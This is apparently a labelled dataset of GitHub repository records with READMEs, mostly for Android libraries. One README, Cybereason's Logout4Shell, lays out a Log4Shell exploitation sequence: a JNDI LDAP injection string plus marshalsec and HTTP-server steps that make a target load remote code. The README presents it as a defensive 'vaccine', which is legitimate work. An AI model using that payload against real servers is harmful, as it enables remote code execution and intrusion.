Columns: full_name (string, 7–104 chars) · description (string, 4–725 chars) · topics (string, 3–468 chars) · readme (string, 13–565k chars) · label (int64, 0 or 1)
heysupratim/material-daterange-picker
A material Date Range Picker based on wdullaer's MaterialDateTimePicker
datepicker datetimepicker material picker range-selection timepicker
[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-MaterialDateRangePicker-brightgreen.svg?style=flat)](http://android-arsenal.com/details/1/2501) [![Download](https://api.bintray.com/packages/borax12/maven/material-datetime-rangepicker/images/download.svg)](https://bintray.com/borax12/maven/material-datetime-rangepicker/_latestVersion) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.borax12.materialdaterangepicker/library/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.borax12.materialdaterangepicker/library)

Material Date and Time Picker with Range Selection
======================================================

Credits to the original amazing material date picker library by wdullaer - https://github.com/wdullaer/MaterialDateTimePicker

## Adding to your project

Add the jcenter repository information in your build.gradle file like this:

```gradle
repositories {
  jcenter()
}

dependencies {
  implementation 'com.borax12.materialdaterangepicker:library:2.0'
}
```

Beginning with version 2.0, the library is also available on Maven Central.

## Date Selection

![FROM](/screenshots/2.png?raw=true) ![TO](/screenshots/1.png?raw=true)

## Time Selection

![FROM](/screenshots/3.png?raw=true) ![TO](/screenshots/4.png?raw=true)

Support for Android 4.0 and up.

From the original library documentation - you may also add the library as an Android Library to your project. All the library files live in `library`.

Using the Pickers
--------------------------------

1. Implement an `OnDateSetListener` or `OnTimeSetListener`
2. Create a `DatePickerDialog` using the supplied factory

### Implement an `OnDateSetListener`

In order to receive the date set in the picker, you will need to implement the `OnDateSetListener` interface. Typically this will be the `Activity` or `Fragment` that creates the pickers.

or

### Implement an `OnTimeSetListener`

In order to receive the time set in the picker, you will need to implement the `OnTimeSetListener` interface. Typically this will be the `Activity` or `Fragment` that creates the pickers.

```java
// new onDateSet
@Override
public void onDateSet(DatePickerDialog view, int year, int monthOfYear, int dayOfMonth,
                      int yearEnd, int monthOfYearEnd, int dayOfMonthEnd) {
}

@Override
public void onTimeSet(RadialPickerLayout view, int hourOfDay, int minute,
                      int hourOfDayEnd, int minuteEnd) {
    String hourString = hourOfDay < 10 ? "0"+hourOfDay : ""+hourOfDay;
    String minuteString = minute < 10 ? "0"+minute : ""+minute;
    String hourStringEnd = hourOfDayEnd < 10 ? "0"+hourOfDayEnd : ""+hourOfDayEnd;
    String minuteStringEnd = minuteEnd < 10 ? "0"+minuteEnd : ""+minuteEnd;
    String time = "You picked the following time: From - "+hourString+"h"+minuteString+" To - "+hourStringEnd+"h"+minuteStringEnd;
    timeTextView.setText(time);
}
```

### Create a `DatePickerDialog` using the supplied factory

You will need to create a new instance of `DatePickerDialog` using the static `newInstance()` method, supplying proper default values and a callback. Once the dialogs are configured, you can call `show()`.
```java
Calendar now = Calendar.getInstance();
DatePickerDialog dpd = DatePickerDialog.newInstance(
        MainActivity.this,
        now.get(Calendar.YEAR),
        now.get(Calendar.MONTH),
        now.get(Calendar.DAY_OF_MONTH)
);
dpd.show(getFragmentManager(), "Datepickerdialog");
```

### Create a `TimePickerDialog` using the supplied factory

You will need to create a new instance of `TimePickerDialog` using the static `newInstance()` method, supplying proper default values and a callback. Once the dialogs are configured, you can call `show()`.

```java
Calendar now = Calendar.getInstance();
TimePickerDialog tpd = TimePickerDialog.newInstance(
        MainActivity.this,
        now.get(Calendar.HOUR_OF_DAY),
        now.get(Calendar.MINUTE),
        false
);
tpd.show(getFragmentManager(), "Timepickerdialog");
```

For other documentation regarding theming, handling orientation changes, and callbacks, check out the original documentation - https://github.com/wdullaer/MaterialDateTimePicker
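For illustration, a minimal sketch of an `onDateSet` body that formats the selected range (the `dateTextView` field and the formatting are assumptions for this sketch, not part of the library):

```java
@Override
public void onDateSet(DatePickerDialog view, int year, int monthOfYear, int dayOfMonth,
                      int yearEnd, int monthOfYearEnd, int dayOfMonthEnd) {
    // Months are zero-based, as in java.util.Calendar, hence the +1.
    String range = String.format(Locale.US, "From %04d-%02d-%02d to %04d-%02d-%02d",
            year, monthOfYear + 1, dayOfMonth, yearEnd, monthOfYearEnd + 1, dayOfMonthEnd);
    dateTextView.setText(range); // assumed TextView in your layout
}
```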
0
Cybereason/Logout4Shell
Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell
null
# Logout4Shell

![logo](https://github.com/Cybereason/Logout4Shell/raw/main/assets/CR_logo.png)

## Description

A vulnerability impacting Apache Log4j versions 2.0 through 2.14.1 was disclosed on the project's GitHub on December 9, 2021. The flaw has been dubbed "Log4Shell" and has the highest possible severity rating of 10. Software made or managed by the Apache Software Foundation (from here on, just "Apache") is pervasive and comprises nearly a third of all web servers in the world—making this a potentially catastrophic flaw.

The Log4Shell vulnerability CVE-2021-44228 was published on 12/9/2021 and allows remote code execution on vulnerable servers. While the best mitigation against these vulnerabilities is to patch log4j to ~~2.15.0~~ 2.17.0 or above, on log4j versions >= 2.10 this behavior can be partially mitigated (see below) by setting the system property `log4j2.formatMsgNoLookups` to `true` or by removing the JndiLookup class from the classpath.

On 12/14/2021 the Apache Software Foundation disclosed CVE-2021-45046, which was patched in log4j version 2.16.0. This vulnerability showed that in certain scenarios, for example, where attackers can control a thread-context variable that gets logged, even the flag `log4j2.formatMsgNoLookups` is insufficient to mitigate Log4Shell. An additional, less severe CVE, CVE-2021-45105, was discovered. This vulnerability exposes the server to an infinite recursion that could crash the server in some scenarios. It is recommended to upgrade to 2.17.0.

However, enabling this system property requires access to the vulnerable servers as well as a restart.

The [Cybereason](https://www.cybereason.com) research team has developed the following code that _exploits_ the same vulnerability, and the payload therein disables the vulnerable setting. The payload then searches for all `LoggerContext`s and removes the JNDI `Interpolator`, preventing even recursive abuses. This effectively blocks any further attempt to exploit Log4Shell on this server.

This proof of concept is based on [@tangxiaofeng7](https://github.com/tangxiaofeng7)'s [tangxiaofeng7/apache-log4j-poc](https://github.com/tangxiaofeng7/apache-log4j-poc). However, this project attempts to fix the vulnerability by using the bug against itself.

You can learn more about Cybereason's "vaccine" approach to the Apache Log4Shell vulnerability (CVE-2021-44228) on our website. Learn more: [Cybereason Releases Vaccine to Prevent Exploitation of Apache Log4Shell Vulnerability (CVE-2021-44228)](https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228)

## Supported versions

Logout4Shell supports log4j versions 2.0 - 2.14.1.

## How it works

On versions of log4j (>= 2.10.0) that support the configuration `FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS`, this value is set to `true`, disabling the lookup mechanism entirely. As disclosed in CVE-2021-45046, setting this flag is insufficient; therefore the payload searches all existing `LoggerContext`s and removes the JNDI key from the `Interpolator` used to process `${}` fields. This means that even other recursive uses of the JNDI mechanisms will fail. Then, the log4j jar file is remade and patched. The patch is included in this git repository; however, it is not needed in the final build because the real patch is included in the payload as Base64.
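For intuition only, here is a heavily simplified Java sketch of the transient part of the mechanism described above. It is not the actual Cybereason payload; the `strLookupMap` field name comes from log4j 2.x internals and may differ between versions:

```java
import java.lang.reflect.Field;
import java.util.Map;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.core.LoggerContext;
import org.apache.logging.log4j.core.lookup.StrLookup;

public class VaccineSketch {
    @SuppressWarnings("unchecked")
    public static void apply() throws Exception {
        // Disable ${...} lookups in log messages (honored by log4j >= 2.10).
        System.setProperty("log4j2.formatMsgNoLookups", "true");

        // Remove the "jndi" lookup from the Interpolator of the current
        // LoggerContext so even nested lookups cannot reach JNDI.
        LoggerContext ctx = (LoggerContext) LogManager.getContext(false);
        StrLookup resolver = ctx.getConfiguration().getStrSubstitutor().getVariableResolver();
        Field map = resolver.getClass().getDeclaredField("strLookupMap"); // log4j internal detail
        map.setAccessible(true);
        ((Map<String, StrLookup>) map.get(resolver)).remove("jndi");
    }
}
```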
In persistent mode (see [below](#transient-vs-persistent-mode)), the payload additionally attempts to locate `log4j-core.jar`, remove the `JndiLookup` class, and modify the PluginCache to completely remove the JNDI plugin. Upon subsequent JVM restarts the `JndiLookup` class cannot be found and log4j will not support JNDI.

## Transient vs Persistent mode

This package generates two flavors of the payload - Transient and Persistent.

In Transient mode, the payload modifies the current running JVM. The payload is very careful to touch only the logger context and configuration. We thus believe the risk of using Transient mode is very low on production environments.

Persistent mode performs all the changes of Transient mode and *in addition* searches for the jar from which `log4j` loads the `JndiLookup` class. It then attempts to modify this jar by removing the `JndiLookup` class as well as modifying the plugin registry. There is inherently more risk in this approach, as the JVM may crash on start if `log4j-core.jar` becomes corrupted.

The choice of mode is selected by the URL given in step [2.4](#execution) below. The class `Log4jRCETransient` selects Transient mode and the class `Log4jRCEPersistent` selects Persistent mode.

Persistent mode is based on the work of [TudbuT](https://github.com/TudbuT). Thank you!

## How to use

1. Download this repository and build it
   1.1 `git clone https://github.com/cybereason/Logout4Shell.git`
   1.2 build it - `mvn package`
   1.3 `cd target/classes`
   1.4 run the webserver - `python3 -m http.server 8888`
2. Download, build and run Marshalsec's ldap server
   2.1 `git clone https://github.com/mbechler/marshalsec.git`
   2.2 `mvn package -DskipTests`
   2.3 `cd target`
   2.4 <a name="execution"></a>`java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<IP_OF_PYTHON_SERVER_FROM_STEP_1>:8888/#Log4jRCE<Transient/Persistent>"`
3. To immunize a server
   3.1 enter `${jndi:ldap://<IP_OF_LDAP_SERVER_FROM_STEP_2>:1389/a}` into a vulnerable field (such as user name)

## DISCLAIMER:

The code described in this advisory (the "Code") is provided on an "as is" and "as available" basis and may contain bugs, errors and other defects. You are advised to safeguard important data and to use caution. By using this Code, you agree that Cybereason shall have no liability to you for any claims in connection with the Code. Cybereason disclaims any liability for any direct, indirect, incidental, punitive, exemplary, special or consequential damages, even if Cybereason or its related parties are advised of the possibility of such damages. Cybereason undertakes no duty to update the Code or this advisory.

## License

The source code for the site is licensed under the MIT license, which you can find in the LICENSE file.
0
DingMouRen/PaletteImageView
An ImageView that understands intelligent color matching and can also give itself colorful shadows.
null
![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p1.png)

### English Readme

[English Version](https://github.com/hasanmohdkhan/PaletteImageView/blob/master/README%20English.md) (Thank you, [hasanmohdkhan](https://github.com/hasanmohdkhan))

### Introduction

* Parses the dominant color of an image and, **by default, uses it as the color of the view's shadow**
* The **shadow color can also be set manually**
* The **radius of all four corners can be controlled** (if the view is square, increasing the corner radius turns it into a circle)
* The **blur radius of the shadow can be controlled**
* The **shadow offset can be controlled separately along the x and y axes**
* Extracts **six theme colors** from the image; each theme color comes with **recommended colors for background, title, and body text**

### Adding the dependency in build.gradle

```
compile 'com.dingmouren.paletteimageview:paletteimageview:1.0.7'
```

![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/title.gif)

##### 1. Parameter control

Corner radius | Shadow blur range | Shadow offset
---|---|---
![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo1.gif) | ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo2.gif) | ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo3.gif)

##### 2. The shadow color defaults to the image's dominant color

![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo4.gif) ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p2.png)

##### 3. Image color theme parsing

![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p3.png)

### Usage

```
<com.dingmouren.paletteimageview.PaletteImageView
    android:id="@+id/palette"
    android:layout_width="match_parent"
    android:layout_height="wrap_content"
    app:palettePadding="20dp"
    app:paletteOffsetX="15dp"
    app:paletteOffsetY="15dp" />

mPaletteImageView.setOnParseColorListener(new PaletteImageView.OnParseColorListener() {
    @Override // parsing the image's colors finished
    public void onComplete(PaletteImageView paletteImageView) {
        int[] vibrant = paletteImageView.getVibrantColor();
        int[] vibrantDark = paletteImageView.getDarkVibrantColor();
        int[] vibrantLight = paletteImageView.getLightVibrantColor();
        int[] muted = paletteImageView.getMutedColor();
        int[] mutedDark = paletteImageView.getDarkMutedColor();
        int[] mutedLight = paletteImageView.getLightMutedColor();
    }

    @Override // parsing the image's colors failed
    public void onFail() { }
});
```

### XML attributes

XML attribute | Description
---|---
app:palettePadding | **The maximum space reserved for the shadow. 0 means no shadow; only values greater than 0 produce a shadow.**
app:paletteOffsetX | Shadow offset along the x axis
app:paletteOffsetY | Shadow offset along the y axis
app:paletteSrc | Image resource
app:paletteRadius | Corner radius
app:paletteShadowRadius | Shadow blur range

### Public methods

Method | Description
---|---
public void setShadowColor(int color) | Sets a custom shadow color for the view
public void setBitmap(Bitmap bitmap) | Sets the view's bitmap
public void setPaletteRadius(int radius) | Sets the view's corner radius
public void setPaletteShadowOffset(int offsetX, int offsetY) | Sets the shadow offset along the x and y axes
public void setPaletteShadowRadius(int radius) | Sets the shadow blur range
public void setOnParseColorListener(OnParseColorListener listener) | Sets the listener for parsing the image's colors
public int[] getVibrantColor() | Returns the Vibrant theme color array; given an array arry, arry[0] is the recommended title color, arry[1] the recommended body-text color, arry[2] the recommended background color. The colors are only recommendations; choose freely
public int[] getDarkVibrantColor() | Returns the DarkVibrant theme color array; element meanings as above
public int[] getLightVibrantColor() | Returns the LightVibrant theme color array; element meanings as above
public int[] getMutedColor() | Returns the Muted theme color array; element meanings as above
public int[] getDarkMutedColor() | Returns the DarkMuted theme color array; element meanings as above
public int[] getLightMutedColor() | Returns the LightMuted theme color array; element meanings as above

<br>Maintenance of this project is paused.<br>
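For illustration, a minimal sketch of applying one parsed theme to a layout (the `titleView`, `bodyView`, and `cardView` references are assumptions for this sketch; the index meanings follow the table above):

```java
mPaletteImageView.setOnParseColorListener(new PaletteImageView.OnParseColorListener() {
    @Override
    public void onComplete(PaletteImageView paletteImageView) {
        // arry[0] = title color, arry[1] = body-text color, arry[2] = background color
        int[] vibrant = paletteImageView.getVibrantColor();
        if (vibrant != null) {
            titleView.setTextColor(vibrant[0]);
            bodyView.setTextColor(vibrant[1]);
            cardView.setBackgroundColor(vibrant[2]);
        }
    }

    @Override
    public void onFail() {
        // keep the default colors if parsing fails
    }
});
```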
0
totond/TextPathView
A View with text path animation!
null
# TextPathView

![](https://img.shields.io/badge/JCenter-0.2.1-brightgreen.svg)

<figure class="half">
    <img src="https://github.com/totond/MyTUKU/blob/master/textdemo1.gif?raw=true">
    <img src="https://github.com/totond/MyTUKU/blob/master/text1.gif?raw=true">
</figure>

> [Go to the English README](https://github.com/totond/TextPathView/blob/master/README-en.md)

## Introduction

TextPathView is a custom view that turns text into path animations and plays them back, as shown above.

> Here is an [explanation of how it works](https://juejin.im/post/5a9677b16fb9a063375765ad) (in Chinese).

### Important changes in v0.2.+

- You can now control not only the end position of the text path but also its start position, as in the second image above
- Subclasses of PathCalculator can be used to create text-path variations, such as MidCalculator, AroundCalculator, and BlinkCalculator below
- The FillColor attribute can be set directly to control whether the text is filled with color when the animation ends

![TextPathView v0.2.+](https://raw.githubusercontent.com/totond/MyTUKU/master/textpathnew1.png)

## Usage

The basic flow is: set the text, configure some animation attributes and painter effects, then start the animation. You can also control the drawing progress yourself; see below for details.

### Gradle

```
compile 'com.yanzhikai:TextPathView:0.2.1'
```

> minSdkVersion 16
> If the drawing disappears after the animation finishes, try disabling hardware acceleration; `drawPath()` may not be supported with hardware acceleration.

### How to use

#### TextPathView

There are two kinds of TextPathView: SyncTextPathView, which draws each stroke in order, and AsyncTextPathView, which draws all strokes at the same time. Both are used the same way: configure the attributes in XML, then call startAnimation() from Java. See the examples and the demo for details. A simple example:

In XML:

```
<yanzhikai.textpath.SyncTextPathView
    android:id="@+id/stpv_2017"
    android:layout_width="match_parent"
    android:layout_height="wrap_content"
    app:duration="12000"
    app:showPainter="true"
    app:text="2017"
    app:textInCenter="true"
    app:textSize="60sp"
    android:layout_weight="1" />

<yanzhikai.textpath.AsyncTextPathView
    android:id="@+id/atpv_1"
    android:layout_width="wrap_content"
    android:layout_height="wrap_content"
    app:duration="12000"
    app:showPainter="true"
    app:text="炎之铠"
    app:textStrokeColor="@android:color/holo_orange_light"
    app:textInCenter="true"
    app:textSize="62sp"
    android:layout_gravity="center_horizontal" />
```

In Java:

```
atpv1 = findViewById(R.id.atpv_1);
stpv_2017 = findViewById(R.id.stpv_2017);
// animate from invisible to fully drawn
atpv1.startAnimation(0, 1);
// animate from fully drawn to invisible
stpv_2017.startAnimation(1, 0);
```

You can also control what TextPathView shows by driving the progress yourself, here with a SeekBar:

```
sb_progress.setOnSeekBarChangeListener(new SeekBar.OnSeekBarChangeListener() {
    @Override
    public void onProgressChanged(SeekBar seekBar, int progress, boolean fromUser) {
        atpv1.drawPath(progress / 1000f);
        stpv_2017.drawPath(progress / 1000f);
    }

    @Override
    public void onStartTrackingTouch(SeekBar seekBar) { }

    @Override
    public void onStopTrackingTouch(SeekBar seekBar) { }
});
```

#### PathView

PathView was added in version 0.1.1 and has three subclasses: TextPathView, SyncPathView and AsyncPathView. The first, described above, is for text paths; the latter two are for graphic paths and must be given a Path object to run properly:

```
public class TestPath extends Path {
    public TestPath() {
        init();
    }

    private void init() {
        addCircle(350, 300, 150, Direction.CCW);
        addCircle(350, 300, 100, Direction.CW);
        addCircle(350, 300, 50, Direction.CCW);
        moveTo(350, 300);
        lineTo(550, 500);
    }
}
```

```
// setPath must be called first to set the path
aspv.setPath(new TestPath());
aspv.startAnimation(0, 1);
```

![](https://github.com/totond/MyTUKU/blob/master/textdemo2.gif?raw=true)

(The screen recording has some artifacts; there is actually no background color.) The above shows SyncPathView and AsyncPathView; the difference between them is the same as for the text versions.

### Attributes

|**Attribute**|**Meaning**|**Type**|**Default**|
|--|--|:--:|:--:|
|textSize | Text size | integer| 108 |
|text | Text content | String| Test|
|autoStart| Whether to start the animation automatically after loading | boolean| false|
|showInStart| Whether to show the full text at the start | boolean| false|
|textInCenter| Whether to center the text in the view | boolean| false|
|duration | Animation duration, in ms | integer| 10000|
|showPainter | Whether to show the painter effect while the animation runs | boolean| false|
|showPainterActually| Whether to show the painter effect at all times| boolean| false|
|~~textStrokeWidth~~ strokeWidth | Stroke width of the path | dimension| 5px|
|~~textStrokeColor~~ pathStrokeColor| Stroke color of the path | color| Color.black|
|paintStrokeWidth | Stroke width of the painter effect | dimension| 3px|
|paintStrokeColor | Stroke color of the painter effect | color| Color.black|
|repeat| Whether and how to repeat the animation| enum | NONE|
|fillColor| Whether to fill the text with color when the animation ends | boolean | false |
|**repeat value**|**Meaning**|
|--|--|
|NONE|Do not repeat|
|RESTART|Repeat from the beginning|
|REVERSE|Repeat in reverse|

> PS: Because the painter effect should disappear once drawing finishes, showPainterActually is automatically set to false after every animation run. It is therefore best used when you are not using the built-in animations.

### Methods

#### Painter effects

```
// set a synchronous painter effect
public void setPainter(SyncPathPainter painter);
// set an asynchronous painter effect
public void setPainter(AsyncPathPainter painter);
```

Because the drawing models differ, there are two kinds of painter effects:

```
public interface SyncPathPainter extends PathPainter {
    // called when the animation starts
    void onStartAnimation();

    /**
     * Called while the painter effect is drawn
     * @param x x coordinate of the current drawing point
     * @param y y coordinate of the current drawing point
     * @param paintPath the painter's Path object; draw the desired effect into it
     */
    @Override
    void onDrawPaintPath(float x, float y, Path paintPath);
}

public interface AsyncPathPainter extends PathPainter {
    /**
     * Called while the painter effect is drawn
     * @param x x coordinate of the current drawing point
     * @param y y coordinate of the current drawing point
     * @param paintPath the painter's Path object; draw the desired effect into it
     */
    @Override
    void onDrawPaintPath(float x, float y, Path paintPath);
}
```

The names say which is which; to create a custom painter effect, implement one or both of these interfaces and draw the effect yourself.

Three painter effects are also built in, for reference and use (for their implementation, see the [explanation of how it works](http://blog.csdn.net/totond/article/details/79375200)):

```
// arrow painter: adjusts the arrow direction from the velocity between the current and previous point
public class ArrowPainter implements SyncPathPainter {

// pen painter: draws a pen next to the current drawing point
public class PenPainter implements SyncPathPainter, AsyncPathPainter {

// fireworks painter: derived from the arrow, uses the velocity between the current and previous point to control the spark direction
public class FireworksPainter implements SyncPathPainter {
```

As seen above, the fireworks and arrow painters need to remember the previous point, so they only suit the stroke-ordered SyncTextPathView, while PenPainter suits both kinds of TextPathView. A close look at their code shows they are all simple to draw.

#### Custom painter effects

Custom painter effects are also very simple. The idea is to add an extra Path at the current drawing point: implement one or both of SyncPathPainter and AsyncPathPainter and override `onDrawPaintPath(float x, float y, Path paintPath)`, like this:

```
atpv2.setPathPainter(new AsyncPathPainter() {
    @Override
    public void onDrawPaintPath(float x, float y, Path paintPath) {
        paintPath.addCircle(x, y, 6, Path.Direction.CCW);
    }
});
```

![](https://github.com/totond/MyTUKU/blob/master/textdemo3.gif?raw=true)

#### Animation listener

```
// set a custom animation listener
public void setAnimatorListener(PathAnimatorListener animatorListener);
```

PathAnimatorListener is a class that implements the AnimatorListener interface. When subclassing it, do not remove the super calls, as they may perform some work.

#### Paint access

```
// get the paint used to draw the text
public Paint getDrawPaint() {
    return mDrawPaint;
}
// get the paint used to draw the painter effect
public Paint getPaint() {
    return mPaint;
}
```

#### Drawing control

```
/**
 * Draw the text path
 *
 * @param start start of the path, as a fraction
 * @param end end of the path, as a fraction
 */
public abstract void drawPath(float start, float end);

/**
 * Start the path animation
 * @param start path fraction, range 0-1
 * @param end path fraction, range 0-1
 */
public void startAnimation(float start, float end);

/**
 * Draw the path
 * @param progress drawing progress, 0-1
 */
public void drawPath(float progress);

/**
 * Stop animation
 */
public void stopAnimation();

/**
 * Pause animation
 */
@RequiresApi(api = Build.VERSION_CODES.KITKAT)
public void pauseAnimation();

/**
 * Resume animation
 */
@RequiresApi(api = Build.VERSION_CODES.KITKAT)
public void resumeAnimation();
```

#### Fill color

```
// immediately show the full text filled with color
public void showFillColorText();
// set whether to fill with color after the animation finishes
public void setFillColor(boolean fillColor)
```

While the text is being drawn, the text path is not closed, so filling it would look chaotic. `showFillColorText()` is therefore provided to show the full text filled with color directly; typically you fill it as a transition once the animation has finished and the text is fully shown.

![](https://github.com/totond/MyTUKU/blob/master/textdemo4.gif?raw=true)

#### Path calculators

Since version 0.2.+, the PathCalculator was added; set it with `setCalculator(PathCalculator calculator)`. A PathCalculator controls how the path's start and end values map to each progress value. TextPathView ships with several PathCalculator subclasses:

- **MidCalculator** start and end expand from 0.5 toward both sides:

![MidCalculator](https://github.com/totond/MyTUKU/blob/master/text4.gif?raw=true)

- **AroundCalculator** start follows end's growth; once end reaches 0.75, start grows in the opposite direction

![AroundCalculator](https://github.com/totond/MyTUKU/blob/master/text5.gif?raw=true)

- **BlinkCalculator**
start stays at 0 and end grows naturally, but every few steps end jumps to 1, producing a blink

![BlinkCalculator](https://github.com/totond/MyTUKU/blob/master/text2.gif?raw=true)

- **Custom PathCalculator:** you can subclass the abstract class PathCalculator and use its `setStart(float start)` and `setEnd(float end)`; see the built-in PathCalculator implementations above for reference.

#### Others

```
// set the text content
public void setText(String text);
// set the path; it must be set before startAnimation(), otherwise an error is thrown!
public void setPath(Path path);
// set the typeface
public void setTypeface(Typeface typeface);
// clear the canvas
public void clear();
// set whether to show the painter effect during the animation
public void setShowPainter(boolean showPainter);
// set whether to show the painter effect at all times; because the painter effect should disappear once drawing finishes, this is automatically set to false after every animation run
public void setCanShowPainter(boolean canShowPainter);
// set the animation duration
public void setDuration(int duration);
// set the repeat mode
public void setRepeatStyle(int repeatStyle);
// set the calculator that maps progress to the path's start and end values
public void setCalculator(PathCalculator calculator)
```

## Changelog

- 2018/03/08 **version 0.0.5**:
  - Added `showFillColorText()` to show the full text filled with color directly.
  - Moved PathAnimatorListener out of TextPathView's inner classes; it was too cumbersome to use before.
  - Added the `showPainterActually` attribute to show the painter effect at all times. Because the painter effect should disappear once drawing finishes, it is automatically set to false after every animation run; it is therefore useful when not using the built-in Animator.
- 2018/03/08 **version 0.0.6**:
  - Added `stop(), pause(), resume()` to control the animation. Previously users were expected to use their own Animator; a PR from [toanvc](https://github.com/toanvc) wraps this up, with small modifications by me. The latter two require API 19 or higher.
  - Added the `repeat` attribute to support repeated playback, also from [toanvc](https://github.com/toanvc)'s PR.
- 2018/03/18 **version 0.1.0**:
  - Refactored the code, added the path animations SyncPathView and AsyncPathView, and abstracted the common parent into PathView
  - Added `setDuration()` and `setRepeatStyle()`
  - Renamed the following:

|Old Name|New Name|
|---|---|
|TextPathPainter|PathPainter|
|SyncTextPainter|SyncPathPainter|
|AsyncTextPainter|AsyncPathPainter|
|TextAnimatorListener|PathAnimatorListener|

- 2018/03/21 **version 0.1.2**:
  - Fixed content possibly not being fully shown when the height is wrap_content
  - PathMeasure used to lose about one pixel at the end of the text path; now the full path is shown by checking in onDraw whether progress is 1 (this may fail to render with hardware acceleration, which then needs to be disabled manually for this view)
  - Added typeface setting
  - Added automatic line wrapping

![](https://github.com/totond/MyTUKU/blob/master/textdemo5.gif?raw=true)

- 2018/09/09 **version 0.1.3**:
  - Hardware acceleration disabled by default for this view
  - Added memory-leak handling
  - Preparation for further optimization
- 2019/04/04 **version 0.2.1**:
  - The start position of the text path can now be controlled as well as the end position
  - PathCalculator subclasses can be used for text-path variations, such as MidCalculator, AroundCalculator, and BlinkCalculator above
  - The FillColor attribute can be set directly to control whether the text is filled with color at the end
  - Hardware acceleration issues resolved; enabled by default
  - Removed useless logs and errors

#### Roadmap:

- More effects and more animations; ideas and suggestions are welcome as issues, and PRs are welcome too.
- Better performance. A single TextPathView animates smoothly on an emulator, while several are slightly janky; on a reasonably powerful real device several are fine. No leads on this yet.
- Support for line-break characters in text.
- Measuring the Path's width and height (including whitespace, starting from coordinate (0,0))

## Contributing

If you would like to help improve TextPathView, PRs are welcome:

- First create a branch.
- If you add a new feature or effect, please do not overwrite the demo code of the existing demonstration Activities, such as the examples in FristActivity; add a new Activity for demonstration, or add no demo code.
- If you change existing functionality or code, please include your reasoning and intent.
- Translating the README into English is welcome (no time to keep the English version up to date).

## License

TextPathView is released under the MIT license.

## About the author

> id: 炎之铠
> Email: yanzhikai_yjk@qq.com
> CSDN: http://blog.csdn.net/totond
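As one more illustration, a minimal sketch of a custom square "brush" built on the `SyncPathPainter` interface shown above (`stpv_2017` is the SyncTextPathView from the XML example; the setter name follows the demo snippet above, and the square size is arbitrary):

```java
stpv_2017.setPathPainter(new SyncPathPainter() {
    @Override
    public void onStartAnimation() {
        // nothing to reset for this simple brush
    }

    @Override
    public void onDrawPaintPath(float x, float y, Path paintPath) {
        // draw a small square centered on the current drawing point
        paintPath.addRect(x - 8, y - 8, x + 8, y + 8, Path.Direction.CCW);
    }
});
```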
0
unofficial-openjdk/openjdk
Do not send pull requests! Automated Git clone of various OpenJDK branches
null
This repository is no longer actively updated. Please see https://github.com/openjdk for a much better mirror of OpenJDK!
0
Sunzxyong/Recovery
A crash recovery framework for Android apps.
application-crash crash crash-recovery-framework recovery restore
# **Recovery**

A crash recovery framework!

----

[![Download](https://api.bintray.com/packages/sunzxyong/maven/Recovery/images/download.svg)](https://bintray.com/sunzxyong/maven/Recovery/_latestVersion) ![build](https://img.shields.io/badge/build-passing-blue.svg) [![License](https://img.shields.io/hexpm/l/plug.svg)](https://github.com/Sunzxyong/Recovery/blob/master/LICENSE)

[中文文档](https://github.com/Sunzxyong/Recovery/blob/master/README-Chinese.md)

# **Introduction**

[Blog entry with introduction](http://zhengxiaoyong.com/2016/09/05/Android%E8%BF%90%E8%A1%8C%E6%97%B6Crash%E8%87%AA%E5%8A%A8%E6%81%A2%E5%A4%8D%E6%A1%86%E6%9E%B6-Recovery)

"Recovery" can help you automatically handle application crashes at runtime. It provides the following functionality:

* Automatic recovery of the activity stack and its data;
* Ability to recover only the top activity;
* A way to view and save crash info;
* Ability to restart and clear the cache;
* Falls back to a restart instead of recovering if recovery fails twice within one minute.

# **Art**

![recovery](http://7xswxf.com2.z0.glb.qiniucdn.com//blog/recovery.jpg)

# **Usage**

## **Installation**

**Using Gradle**

```gradle
implementation 'com.zxy.android:recovery:1.0.0'
```

or

```gradle
debugImplementation 'com.zxy.android:recovery:1.0.0'
releaseImplementation 'com.zxy.android:recovery-no-op:1.0.0'
```

**Using Maven**

```xml
<dependency>
  <groupId>com.zxy.android</groupId>
  <artifactId>recovery</artifactId>
  <version>1.0.0</version>
  <type>pom</type>
</dependency>
```

## **Initialization**

You can use this code sample to initialize Recovery in your application:

```java
Recovery.getInstance()
        .debug(true)
        .recoverInBackground(false)
        .recoverStack(true)
        .mainPage(MainActivity.class)
        .recoverEnabled(true)
        .callback(new MyCrashCallback())
        .silent(false, Recovery.SilentMode.RECOVER_ACTIVITY_STACK)
        .skip(TestActivity.class)
        .init(this);
```

If you don't want to show the RecoveryActivity when the application crashes at runtime, you can use silent recovery to restore your application:

```java
Recovery.getInstance()
        .debug(true)
        .recoverInBackground(false)
        .recoverStack(true)
        .mainPage(MainActivity.class)
        .recoverEnabled(true)
        .callback(new MyCrashCallback())
        .silent(true, Recovery.SilentMode.RECOVER_ACTIVITY_STACK)
        .skip(TestActivity.class)
        .init(this);
```

If you only need the RecoveryActivity page in development builds to obtain debug data, and do not want it displayed in release builds, set `recoverEnabled(false)` there.

## **Arguments**

| Argument | Type | Function |
| :-: | :-: | :-: |
| debug | boolean | Whether to enable debug mode |
| recoverInBackground | boolean | Whether to restore the stack when the app crashes in the background |
| recoverStack | boolean | Whether to restore the whole activity stack, or only the top activity |
| mainPage | Class<? extends Activity> | Initial page activity |
| callback | RecoveryCallback | Crash info callback |
| silent | boolean, SilentMode | Whether to use silent recovery; if true, RecoveryActivity is not displayed and the activity stack is restored automatically |

**SilentMode**

> 1. RESTART - Restart the app
> 2. RECOVER_ACTIVITY_STACK - Restore the activity stack
> 3. RECOVER_TOP_ACTIVITY - Restore the top activity
